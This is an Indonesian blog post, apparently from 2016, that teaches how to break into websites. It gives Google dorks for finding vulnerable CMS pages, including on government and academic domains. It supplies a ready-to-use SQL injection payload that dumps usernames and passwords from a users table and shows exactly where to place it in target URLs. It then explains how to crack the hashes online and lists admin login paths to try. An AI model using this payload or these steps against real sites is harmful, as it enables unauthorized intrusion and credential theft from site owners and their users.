Unknown On 24/09/16


Yoo.. gw update lagi, sebenarnya ini tutorial lama, hanya gw mau sharing ajah, buat nyari duit di blog :v.
langsung saja, simak dibawah ini.

Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
inurl:berita-21- ext:html
Note : tambahkan site:org site:net :site:go.id site:ac.id site:id (Use Your Brain)

* Exploit SQLi (SQL Injection) :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Contoh :

http://target.com/path/berita-2-asu-loe-pada.html 

kamu tambahin exploit nya sesudah angka jadi kaya gini :

http://target.com/path/berita-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
-asu-loe-pada.html

belum kelar anunya yang diatas ?

kalau belum, coba tambahin simbol "-" (hapus ") di berita-2 nya

Contoh :

http://target.com/path/berita--2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
-asu-loe-pada.html

abis itu kelar dah, buat jaga-jaga view source sitenya yang udah di exploitasi, agar enak di copy passnya ama usernya terus di decrypt passnya dah,

Link Descrypter > HashKiller.co.uk

Setelah di decrypt passwordnya tinggal login dah.

untuk url admin loginnya cek dibawah ini :

  • /adminweb/
  • /admin/
  • /redaktur/
  • /webadmin/
  • /sistem/
  • /siakad/
  • /redakturadmin/
  • /admin@web/
  • /web@admin/
  • /@dmin/
  • /adminpanel/
  • /controladmin/

Leave a Reply

Subscribe to Posts | Subscribe to Comments